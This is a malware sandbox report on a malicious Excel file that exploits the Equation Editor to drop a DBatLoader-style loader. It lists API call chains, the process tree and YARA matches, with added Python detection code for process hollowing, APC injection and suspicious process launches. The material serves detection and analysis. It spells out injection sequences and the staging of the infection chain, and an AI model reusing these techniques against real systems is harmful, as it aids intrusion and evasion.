Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020707AC NtCreateMutant,LdrInitializeThunk, 6_2_020707AC
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_0206FAD0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_0206FAE8
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_0206FB68
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_0206FBB8
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206F900 NtReadFile,LdrInitializeThunk, 6_2_0206F900
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206F9F0 NtClose,LdrInitializeThunk, 6_2_0206F9F0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FEA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_0206FEA0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_0206FED0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FFB4 NtCreateSection,LdrInitializeThunk, 6_2_0206FFB4
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_0206FC60
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FC90 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_0206FC90
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FD8C NtDelayExecution,LdrInitializeThunk, 6_2_0206FD8C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_0206FDC0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02070060 NtQuerySection, 6_2_02070060
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020710D0 NtOpenProcessToken, 6_2_020710D0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0207010C NtOpenDirectoryObject, 6_2_0207010C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02071148 NtOpenThread, 6_2_02071148
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020701D4 NtSetValueKey, 6_2_020701D4
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FA20 NtQueryInformationFile, 6_2_0206FA20
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FA50 NtEnumerateValueKey, 6_2_0206FA50
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FAB8 NtQueryValueKey, 6_2_0206FAB8
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FB50 NtCreateKey, 6_2_0206FB50
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FBE8 NtQueryVirtualMemory, 6_2_0206FBE8
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206F8CC NtWaitForSingleObject, 6_2_0206F8CC
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02071930 NtSetContextThread, 6_2_02071930
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206F938 NtWriteFile, 6_2_0206F938
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FE24 NtWriteVirtualMemory, 6_2_0206FE24
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FF34 NtQueueApcThread, 6_2_0206FF34
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FFFC NtCreateProcessEx, 6_2_0206FFFC
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FC30 NtOpenProcess, 6_2_0206FC30
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02070C40 NtGetContextThread, 6_2_02070C40
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FC48 NtSetInformationFile, 6_2_0206FC48
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0206FD5C NtEnumerateKey, 6_2_0206FD5C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02071D80 NtSuspendThread, 6_2_02071D80
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00296F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 6_2_00296F06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00296F12 NtQueryInformationProcess, 6_2_00296F12
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00556F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 6_2_00556F06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00556F12 NtQueryInformationProcess, 6_2_00556F12
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00450FCC NtdllDefWindowProc_A, 8_2_00450FCC
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 8_2_0044629C
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00436A08 NtdllDefWindowProc_A,GetCapture, 8_2_00436A08
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 8_2_00451770
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 8_2_00451820
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_0042BE54 NtdllDefWindowProc_A, 8_2_0042BE54
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_03A2CE34 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 8_2_03A2CE34
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00450FCC NtdllDefWindowProc_A, 11_2_00450FCC
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 11_2_0044629C
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00436A08 NtdllDefWindowProc_A,GetCapture, 11_2_00436A08
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 11_2_00451770
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 11_2_00451820
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0042BE54 NtdllDefWindowProc_A, 11_2_0042BE54
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_03C1CE34 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 11_2_03C1CE34
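The call chains at 4_2_042FCE34, 8_2_03A2CE34 and 11_2_03C1CE34 (CreateProcessA, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread) are the textbook process-hollowing sequence, and 6_2_00296F06 / 6_2_00556F06 (RtlWow64SuspendThread, NtSetContextThread, NtQueueApcThread, NtResumeThread) are a suspend / set-context / queue-APC / resume chain. The Python below is an added example, not part of the Joe Sandbox report, that matches ordered API chains against lines in the report's own "Code function" format. The sample lines are copied from the report; the alias sets (which Win32 wrapper and which Nt* call count as the same step) are the author's assumption, not the sandbox's rules.

```python
import re

# Constructed sample: three lines in the shape of the report's "Code function" entries.
# The first two carry the API sequences the report lists for 4_2_042FCE34 (vbc.exe) and
# 6_2_00296F06 (logagent.exe); the third is a benign GUI helper that must not match.
SAMPLE_LINES = [
    r"Source: C:\Users\Public\vbc.exe Code function: 4_2_042FCE34 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 4_2_042FCE34",
    r"Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00296F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 6_2_00296F06",
    r"Source: C:\Users\Public\vbc.exe Code function: 4_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 4_2_00451770",
]

# "Source: <image> Code function: <id> <api,api,...>, <id>"
LINE_RE = re.compile(
    r"^Source: (?P<image>.+?) Code function: (?P<fid>\S+) (?P<apis>\S+?),? (?P=fid)$"
)

# Each step is a set of interchangeable APIs: the Win32 wrapper or the Nt* call it
# ends up in. Which names belong together is an assumption of this example.
HOLLOWING = [
    {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},  # child created suspended
    {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},                 # original image carved out
    {"VirtualAllocEx", "NtAllocateVirtualMemory"},                    # room for the payload
    {"WriteProcessMemory", "NtWriteVirtualMemory"},                   # payload copied in
    {"SetThreadContext", "NtSetContextThread"},                       # entry point redirected
    {"ResumeThread", "NtResumeThread"},                               # payload runs
]
APC_INJECTION = [
    {"RtlWow64SuspendThread", "SuspendThread", "NtSuspendThread"},
    {"SetThreadContext", "NtSetContextThread"},
    {"NtQueueApcThread", "QueueUserAPC"},
    {"ResumeThread", "NtResumeThread"},
]
TECHNIQUES = {
    "process hollowing": HOLLOWING,
    "APC injection into a suspended thread": APC_INJECTION,
}


def matches_in_order(steps, calls):
    """True when every step occurs in `calls` in the given order; gaps are allowed,
    so the extra ReadProcessMemory / repeated VirtualAllocEx calls do not break the match."""
    i = 0
    for call in calls:
        if i < len(steps) and call in steps[i]:
            i += 1
    return i == len(steps)


def classify(calls):
    return [name for name, steps in TECHNIQUES.items() if matches_in_order(steps, calls)]


def scan(lines):
    """Map function id -> (image, [techniques]) for every line whose chain matches."""
    hits = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        calls = [c for c in m.group("apis").split(",") if c]
        found = classify(calls)
        if found:
            hits[m.group("fid")] = (m.group("image"), found)
    return hits


if __name__ == "__main__":
    for fid, (image, found) in scan(SAMPLE_LINES).items():
        print(f"{fid} in {image}: {', '.join(found)}")
```

Order is what makes the match meaningful: an allocation followed by a write and a context change in one function is a different animal from the same APIs scattered across a GUI framework. The many NtdllDefWindowProc_A / IsIconic functions in the same listing are ordinary window procedures and never satisfy either chain.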
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$4514808437.xlsx
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@16/33@6/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Code function: 4_2_00423F40 GetLastError,FormatMessageA, 4_2_00423F40
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Esfjmbxd.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Esfjmbxd.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Esfjmbxd.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Esfjmbxd.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Esfjmbxd.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Esfjmbxd.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041C8A8 FindResourceA,LoadResource,SizeofResource,LockResource, 4_2_0041C8A8
Source: 4514808437.xlsx ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Esfjmbxd.exe "C:\Users\user\Esfjmbxd.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Esfjmbxd.exe "C:\Users\user\Esfjmbxd.exe"
Source: C:\Users\user\Esfjmbxd.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Users\user\Esfjmbxd.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Esfjmbxd.exe "C:\Users\user\Esfjmbxd.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\Esfjmbxd.exe "C:\Users\user\Esfjmbxd.exe"
Source: C:\Users\user\Esfjmbxd.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Users\user\Esfjmbxd.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
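The process tree above tells the whole infection story: Excel hands the embedded object to EQNEDT32.EXE, the Equation Editor writes and launches C:\Users\Public\vbc.exe (the report ties this to CVE-2017-11882 / CVE-2018-0802), the loader stages itself as C:\Users\user\Esfjmbxd.exe and launches a system binary to hollow, and explorer.exe, once injected, spawns cmstp.exe and ipconfig.exe with no arguments. The Python below is an added example, not part of the report, that runs a few process-creation rules over those events (copied from the lines above as constructed tuples). The rule names, the set of "no-argument" utilities and the path heuristics are the author's choices, not Sigma rules from the sandbox.

```python
import ntpath

# Constructed process-creation events (parent image, child image, command line),
# transcribed from the process tree in the report. None = parent not recorded.
EVENTS = [
    (None, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'),
    (None, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    (r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     r"C:\Users\Public\vbc.exe", r'"C:\Users\Public\vbc.exe"'),
    (r"C:\Users\Public\vbc.exe", r"C:\Windows\SysWOW64\logagent.exe",
     r"C:\Windows\System32\logagent.exe"),
    (r"C:\Windows\explorer.exe", r"C:\Users\user\Esfjmbxd.exe", r'"C:\Users\user\Esfjmbxd.exe"'),
    (r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\cmstp.exe", r"C:\Windows\SysWOW64\cmstp.exe"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\ipconfig.exe", r"C:\Windows\SysWOW64\ipconfig.exe"),
]

# Office helper that has no business spawning anything.
OFFICE_HELPERS = {"eqnedt32.exe"}
# System utilities seen launched by explorer.exe with an empty argument list in this
# tree; extend with whatever else shows up in the same position in your own telemetry.
NO_ARG_UTILITIES = {"cmstp.exe", "ipconfig.exe"}


def basename(path):
    return ntpath.basename(path).lower() if path else ""


def first_token(cmdline):
    """Split a command line into (executable, remaining arguments), quoted or not."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end], s[end + 1:].strip()
    parts = s.split(None, 1)
    return parts[0], (parts[1] if len(parts) > 1 else "")


def wow64_equivalent(image, cmd_path):
    """A 32-bit parent that asks for C:\\Windows\\System32\\x.exe gets
    C:\\Windows\\SysWOW64\\x.exe through file-system redirection; that is not spoofing."""
    norm = lambda p: p.lower().replace("\\windows\\system32\\", "\\windows\\syswow64\\")
    return norm(image) == norm(cmd_path)


def staged_in_user_dir(image):
    """C:\\Users\\Public\\* or a file sitting directly in a profile root (C:\\Users\\<name>\\x.exe)."""
    parts = image.lower().split("\\")
    return (len(parts) >= 4 and parts[0] == "c:" and parts[1] == "users"
            and (parts[2] == "public" or len(parts) == 4))


def evaluate(parent, image, cmdline):
    findings = []
    exe, args = first_token(cmdline)
    if basename(parent) in OFFICE_HELPERS:
        findings.append("Equation Editor spawned a child process")
    if staged_in_user_dir(image):
        findings.append("executable launched from a user-writable staging path")
    if basename(parent) == "explorer.exe" and basename(image) in NO_ARG_UTILITIES and not args:
        findings.append("explorer.exe launched a system utility with no arguments")
    if not wow64_equivalent(image, exe):
        findings.append("image path differs from command line beyond WOW64 redirection")
    return findings


def triage(events):
    return {(basename(p), basename(i)): evaluate(p, i, c) for p, i, c in events}


if __name__ == "__main__":
    for (parent, child), findings in triage(EVENTS).items():
        print(f"{parent or '<unknown>'} -> {child}: {findings or 'clean'}")
```

The WOW64 check is the caveat worth keeping: the report's "Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe" looks like a path mismatch, but a 32-bit loader asking for System32 is silently redirected to SysWOW64, so the rule only fires when the two paths differ in some other way (the shape a forged command line would take).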
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREB76.tmp
Source: C:\Users\Public\vbc.exe Code function: 4_2_00408B32 GetDiskFreeSpaceA, 4_2_00408B32
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Esfjmbxd.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Esfjmbxd.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Esfjmbxd.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Esfjmbxd.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: logagent.exe, logagent.exe, 00000006.00000002.615134919.0000000002060000.00000040.00000001.sdmp, logagent.exe, 00000006.00000003.526241583.0000000001ED0000.00000004.00000001.sdmp, logagent.exe, 00000006.00000002.617474362.00000000021E0000.00000040.00000001.sdmp, logagent.exe, 00000006.00000003.525081229.00000000006B0000.00000004.00000001.sdmp
Source: Binary string: cmstp.pdb source: logagent.exe, 00000006.00000002.613866471.0000000000844000.00000004.00000020.sdmp, logagent.exe, 00000006.00000002.613071462.00000000001C0000.00000040.00020000.sdmp

Data Obfuscation:

Yara detected DBatLoader
Source: Yara match File source: 11.3.Esfjmbxd.exe.1da1ef4.278.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3e0c8.115.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d4154c.246.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d4154c.245.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3e0c8.118.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.1ea2094.286.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d1cd68.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.1e8d594.279.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d41324.242.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3e610.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d2d598.277.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d20c38.39.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.1e8d598.277.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3db70.110.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d20eec.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.1e8d734.287.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3db70.107.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3e2fc.123.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d41ef4.278.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d2d734.287.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d42094.286.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d20b08.34.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d42094.284.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.1ea1ef4.278.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Esfjmbxd.exe.1d8d598.275.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d41774.249.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Esfjmbxd.exe.1d8d594.280.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Esfjmbxd.exe.1d2d734.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3d60c.102.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3d0a8.94.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d41324.241.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d2d594.279.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d41520.48.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Esfjmbxd.exe.1d8d734.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000003.544671819.0000000001D1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566665565.0000000001DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.525659304.0000000001E8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566085923.0000000001DA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544180474.0000000001D1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566289908.0000000001DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.482158842.0000000001EA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566501613.0000000001DA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.603310457.0000000001D2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.480503780.0000000001E7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566202052.0000000001D8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.479950965.0000000001E7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566715665.0000000001D7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544264946.0000000001D2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.480681894.0000000001E8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566148762.0000000001D7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544497330.0000000001D1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566552143.0000000001D7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544614514.0000000001D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.480350918.0000000001E8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544308555.0000000001D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544544050.0000000001D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566595226.0000000001D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.481290433.0000000001E7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544115744.0000000001D44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544390642.0000000001D2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.482088353.0000000001E90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.482210070.0000000001E7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.479891596.0000000001EA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.642465080.0000000001D8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.480431968.0000000001EA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544431863.0000000001D44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544350421.0000000001D1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566373519.0000000001D7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566438198.0000000001D8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.481026953.0000000001EA4000.00000004.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043DD6C push 0043DDF9h; ret 4_2_0043DDF1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00458108 push 00458140h; ret 4_2_00458138
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A1F4 push 0042A220h; ret 4_2_0042A218
Source: C:\Users\Public\vbc.exe Code function: 4_2_004201F8 push ecx; mov dword ptr [esp], edx 4_2_004201FD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00458180 push 004581ACh; ret 4_2_004581A4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A1AC push 0042A1EAh; ret 4_2_0042A1E2
Source: C:\Users\Public\vbc.exe Code function: 4_2_0045A1B4 push 0045A427h; ret 4_2_0045A41F
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A22C push 0042A264h; ret 4_2_0042A25C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042C294 push 0042C2D7h; ret 4_2_0042C2CF
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406340 push 00406391h; ret 4_2_00406389
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042C30C push 0042C338h; ret 4_2_0042C330
Source: C:\Users\Public\vbc.exe Code function: 4_2_00428448 push 00428518h; ret 4_2_00428510
